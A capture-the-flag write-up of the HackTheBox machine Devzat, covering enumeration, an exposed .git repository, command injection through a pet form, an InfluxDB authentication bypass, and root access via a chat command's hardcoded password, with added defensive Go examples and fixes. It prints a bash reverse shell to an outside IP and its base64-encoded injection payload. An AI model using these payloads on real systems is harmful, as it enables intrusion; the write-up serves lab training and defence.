---
title: "Writeup - Devzat (HTB)"
date: 2022-03-15
slug: "writeup-devzat-htb"
type: "writeup-ctf"
--- 

This is a writeup for the [Devzat](https://app.hackthebox.com/machines/Devzat) machine from the HackTheBox site.

## Enumeration

First, let's start with a scan of our target with the following command:


```bash
nmap -sV 10.10.11.118
```
Three TCP ports are discovered:

![](img/image-1.webp)

- 22/tcp: SSH (OpenSSH 8.2p1)
- 80/tcp: HTTP web server (Apache 2.4.41)
- 8000/tcp: SSH

I add the domain to the /etc/hosts file:


```bash
10.10.11.118	devzat.htb
```
I then access the site via a browser:

![](img/image-2.webp)

## Exploit

After looking at the site I notice that a shell command is given as an example at the bottom of the page:


```bash
ssh -l [user_name] devzat.htb -p 8000
```
This command connects to the application hosted on port 8000.

![](img/image-3.webp)

This application is an interactive chat with a number of commands available:

![](img/image-4.webp)

Nothing notable so far. I run a directory scan on the site with "ffuf" and the wordlist [common.txt](http://ffuf.me/wordlists).


```bash
ffuf -c -u http://devzat.htb/FUZZ -w Documents/commun.txt
```
![](img/image-5.webp)

Several directories, but fairly standard ones. Now let's scan for subdomains:


```bash
ffuf -c -u http://devzat.htb -w Documents/sub.txt -H "Host: FUZZ.devzat.htb" -fw 18
```
![](img/image-6.webp)

A subdomain is found! I add it to the /etc/hosts file, then visit the site:

![](img/image-7.webp)

It is a web page with a form to add pets. Now let's scan the directories of this subdomain.

![](img/image-8.webp)

The project's .git directory is exposed, with a number of files.

![](img/image-9.webp)

I download the repository with the following command:


```bash
wget -r -np -R "index.html*" http://pets.devzat.htb/.git
```
I first check the last commit to see if any files have been modified or deleted:

![](img/image-10.webp)

And indeed a large number of files have been deleted, so I restore them from the last commit with the following command:


```bash
git checkout -- .
```
![](img/image-11.webp)

Now that we have the complete tree, let's start the code analysis with main.go.

In this file I find a function that loads the pet's character. It takes the species as an argument, then runs an "sh" command that reads one of the files in the "characteristics" folder. Since the species comes straight from the form, we will be able to use this function to execute code.

![](img/image-12.webp)
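Since main.go is only shown as a screenshot above, here is an added illustration (my own code, not the project's; the function names and the "characteristics" directory layout are assumed) of the pattern described and of its fix: the species has to match a strict allowlist before it is used, and the file is read directly instead of through a shell, so there is nothing left to inject into.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"os/exec"
	"path/filepath"
	"regexp"
)

// loadCharacterUnsafe mirrors the pattern the writeup describes: the species
// string from the form is pasted into a shell command line, so any shell
// metacharacter in it is interpreted by sh. Kept only for contrast; never
// call it with untrusted input. (Assumed shape, not the project's code.)
func loadCharacterUnsafe(dir, species string) (string, error) {
	out, err := exec.Command("sh", "-c", "cat "+filepath.Join(dir, species)).Output()
	return string(out), err
}

// speciesPattern is the allowlist: a species is a short lowercase word.
// ";", "|", "/", "..", spaces, quotes and newlines all fail it before they
// can reach the filesystem or a shell.
var speciesPattern = regexp.MustCompile(`^[a-z]{1,32}$`)

// ErrBadSpecies is returned for any value that fails the allowlist.
var ErrBadSpecies = errors.New("invalid species name")

// loadCharacter is the hardened form: validate first, then read the file
// directly with os.ReadFile. No shell is involved.
func loadCharacter(dir, species string) (string, error) {
	if !speciesPattern.MatchString(species) {
		return "", fmt.Errorf("%w: %q", ErrBadSpecies, species)
	}
	data, err := os.ReadFile(filepath.Join(dir, species))
	if err != nil {
		return "", fmt.Errorf("reading characteristics for %q: %w", species, err)
	}
	return string(data), nil
}

func main() {
	// Constructed sample: a temporary "characteristics" directory with one species file.
	dir, err := os.MkdirTemp("", "characteristics")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	if err := os.WriteFile(filepath.Join(dir, "cat"), []byte("independent\n"), 0o600); err != nil {
		panic(err)
	}
	for _, s := range []string{"cat", "cat; id", "../../etc/passwd"} {
		out, err := loadCharacter(dir, s)
		fmt.Printf("%-20q -> %q err=%v\n", s, out, err)
	}
}
```

The allowlist is deliberately narrower than "reject known-bad characters": a species name is a word, so anything that is not a word is refused, and the error tells the caller why.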

To do so, I submit a normal request and intercept it with Burp.

![](img/image-13.webp)

Then I modify the value of "species" to insert my command. I first try a classic reverse shell, without success.

![](img/image-14.webp)

Let's Base64-encode the command so that it is not altered before execution on the target machine.

[Reverse Shells - Pentest Book](https://pentestbook.six2dez.com/exploitation/reverse-shells)

I use the following command to encode my reverse shell in base64:


```bash
echo "bash -i >& /dev/tcp/10.10.16.2/1234 0>&1" | base64
```
Then I submit the following command through the form:


```bash
echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4yLzEyMzQgMD4mMQo=' | base64 -d | bash
```
Bingo, I am now connected as Patrick.

![](img/image-15.webp)

Unfortunately this user does not have the first flag. I will have to find a way to switch users. To start, I run the [linPeas](http://linpeas.sh) script to get an overview of the machine.

The first thing that catches my attention is the number of open ports.

![](img/image-16.webp)

Indeed, a number of ports are open only locally on the machine, so I set up SSH port forwarding.


```bash
ssh -L 8086:127.0.0.1:8086 -N patrick@10.10.11.118
```
I can then perform an nmap scan on my local address to identify the service running on port 8086.

![](img/image-17.webp)

InfluxDB version 1.7.5 is running on this port. Let's look for an exploit...

After some research I find CVE-2019-20933, a vulnerability that gives admin access to the database without a password. I use the following script:

{{< github repo="LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933" >}}
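CVE-2019-20933 is a flaw in InfluxDB's JWT bearer-token authentication: when no shared secret was configured, the handler still verified tokens, against an empty secret, so a token signed with an empty key was accepted. As an added illustration (written from scratch on the Go standard library, not InfluxDB's code; the claim names and the demo secret are made up), here is a minimal HS256 verifier that refuses to operate without a secret, pins the algorithm, and compares signatures in constant time:

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
	"time"
)

var (
	ErrNoSecret = errors.New("jwt auth enabled without a shared secret; refusing to verify")
	ErrBadToken = errors.New("malformed or invalid token")
	ErrExpired  = errors.New("token expired")
)

// claims is the subset of the JWT payload this demo cares about (assumed names).
type claims struct {
	Username string `json:"username"`
	Exp      int64  `json:"exp"`
}

// sign builds a compact HS256 JWT: base64url(header).base64url(payload).base64url(sig).
// It exists only so the demonstration can mint tokens, including one with an empty key.
func sign(secret []byte, c claims) (string, error) {
	header := base64.RawURLEncoding.EncodeToString([]byte(`{"alg":"HS256","typ":"JWT"}`))
	body, err := json.Marshal(c)
	if err != nil {
		return "", err
	}
	signingInput := header + "." + base64.RawURLEncoding.EncodeToString(body)
	mac := hmac.New(sha256.New, secret)
	mac.Write([]byte(signingInput))
	return signingInput + "." + base64.RawURLEncoding.EncodeToString(mac.Sum(nil)), nil
}

// verify checks an HS256 token against the server's shared secret. The first
// check is the fix for this bug class: an empty secret means none was
// configured, and verifying against it would accept any token a client
// signs with an empty key.
func verify(secret []byte, token string, now time.Time) (claims, error) {
	var c claims
	if len(secret) == 0 {
		return c, ErrNoSecret
	}
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return c, ErrBadToken
	}
	var hdr struct {
		Alg string `json:"alg"`
	}
	hb, err := base64.RawURLEncoding.DecodeString(parts[0])
	if err != nil || json.Unmarshal(hb, &hdr) != nil || hdr.Alg != "HS256" {
		return c, ErrBadToken // also rejects "alg":"none"
	}
	sig, err := base64.RawURLEncoding.DecodeString(parts[2])
	if err != nil {
		return c, ErrBadToken
	}
	mac := hmac.New(sha256.New, secret)
	mac.Write([]byte(parts[0] + "." + parts[1]))
	if !hmac.Equal(sig, mac.Sum(nil)) { // constant-time comparison
		return c, ErrBadToken
	}
	pb, err := base64.RawURLEncoding.DecodeString(parts[1])
	if err != nil || json.Unmarshal(pb, &c) != nil {
		return c, ErrBadToken
	}
	if c.Exp == 0 || now.Unix() >= c.Exp {
		return c, ErrExpired
	}
	return c, nil
}

func main() {
	secret := []byte("constructed-demo-secret") // placeholder, not a deployment value
	now := time.Now()
	good, _ := sign(secret, claims{Username: "admin", Exp: now.Add(time.Minute).Unix()})
	forged, _ := sign(nil, claims{Username: "admin", Exp: now.Add(time.Minute).Unix()})
	_, err := verify(secret, good, now)
	fmt.Println("properly signed token:", err)
	_, err = verify(secret, forged, now)
	fmt.Println("empty-key token, server has a secret:", err)
	_, err = verify(nil, forged, now)
	fmt.Println("empty-key token, server has no secret:", err)
}
```

In a real service the secret comes from configuration and startup should fail when it is missing; the check inside verify is the last line of defence, so that a misconfigured instance fails closed rather than open.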

I can now search the different databases for information. First I look for the registered users:

![](img/image-19.webp)

I find the user "catherine" with her password. This is very good news, since she is the one who has the first flag.

![](img/image-20.webp)

I connect with ssh, then I get the flag.

## Privilege escalation

In the linPeas output I also noticed a "devchat" service running under patrick's account. It looks like a test version listening on port 8443 alongside the production version.


```bash
catherine@devzat:~/dev/dev$ ps aux | grep dev
[...]
patrick	839	0.0	0.5	1085916	11904	?	Sl	12:28	0:00	./devchat
[...]
```
I also found backup files related to this same service:

![](img/image-21.webp)

These files belong to catherine, so I can retrieve and analyze them to find an exploit.

In the file "commands.go", I quickly find that the /file command requires a password, and that this password is written in plain text in the source.

![](img/image-22.webp)

OK, let's try what we have discovered.

I log back in as patrick, then open an SSH session to the local port 8443.

![](img/image-23.webp)

Let's try to read a root-owned file with the /file command and the password found previously. I test with root's id_rsa.

![](img/image-24.webp)

It works! I can now connect as root over SSH and get the last flag.

![](img/image-25.webp)
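The /file command above hands back any file the process can open, gated only by a password that sits in the source, and the process has enough privilege to read root's key. An added example of the mitigation (my own code, not devchat's; the share directory and function names are assumed): confine requests to a shared directory, re-checking after symlink resolution so a link dropped into the share cannot point outside it, and refuse to serve files at all when running as root, which is the last item of the recommendations below.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

var (
	ErrOutsideShare  = errors.New("requested path is outside the shared directory")
	ErrRunningAsRoot = errors.New("refusing to start with root privileges")
)

// privilegeCheck refuses to serve files when the effective uid is root: a
// chat bot has no business reading /root/.ssh/id_rsa, so it should not be
// able to. Call it with os.Geteuid() at startup.
func privilegeCheck(euid int) error {
	if euid == 0 {
		return ErrRunningAsRoot
	}
	return nil
}

// inside reports whether path equals base or lies beneath it.
func inside(base, path string) bool {
	rel, err := filepath.Rel(base, path)
	if err != nil {
		return false
	}
	return rel != ".." && !strings.HasPrefix(rel, ".."+string(filepath.Separator))
}

// resolveShared maps the argument of a "/file <name>" command to a path that
// is guaranteed to live under shareDir: absolute paths are rejected, ".."
// segments are collapsed by filepath.Join and caught by the containment
// check, and symlinks are resolved and checked again.
func resolveShared(shareDir, requested string) (string, error) {
	if filepath.IsAbs(requested) {
		return "", ErrOutsideShare
	}
	base, err := filepath.Abs(shareDir)
	if err != nil {
		return "", err
	}
	if base, err = filepath.EvalSymlinks(base); err != nil {
		return "", err
	}
	candidate := filepath.Join(base, requested)
	if !inside(base, candidate) {
		return "", ErrOutsideShare
	}
	real, err := filepath.EvalSymlinks(candidate)
	if err != nil {
		return "", err // missing file, permission error, etc.
	}
	if !inside(base, real) {
		return "", ErrOutsideShare
	}
	return real, nil
}

// serveFile is what the /file handler would call: confine, then read.
func serveFile(shareDir, requested string) (string, error) {
	p, err := resolveShared(shareDir, requested)
	if err != nil {
		return "", err
	}
	data, err := os.ReadFile(p)
	if err != nil {
		return "", err
	}
	return string(data), nil
}

func main() {
	if err := privilegeCheck(os.Geteuid()); err != nil {
		fmt.Println(err)
		return
	}
	// Constructed sample share directory with one file.
	share, err := os.MkdirTemp("", "devchat-share")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(share)
	_ = os.WriteFile(filepath.Join(share, "readme.txt"), []byte("shared notes\n"), 0o600)
	for _, req := range []string{"readme.txt", "../../root/.ssh/id_rsa", "/etc/hostname"} {
		out, err := serveFile(share, req)
		fmt.Printf("%-28q -> %q err=%v\n", req, out, err)
	}
}
```

With both measures in place, a leaked /file password only exposes what is deliberately placed in the share, and the process cannot read root's files even if the confinement were bypassed.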

## Recommendations

To fix this host, I think the following actions are needed:

- Do not leave the .git directory accessible on a web site
- Do not build shell commands from input submitted through web forms
- Do not store unhashed passwords in a database
- Update InfluxDB
- Do not run the chat bot with root privileges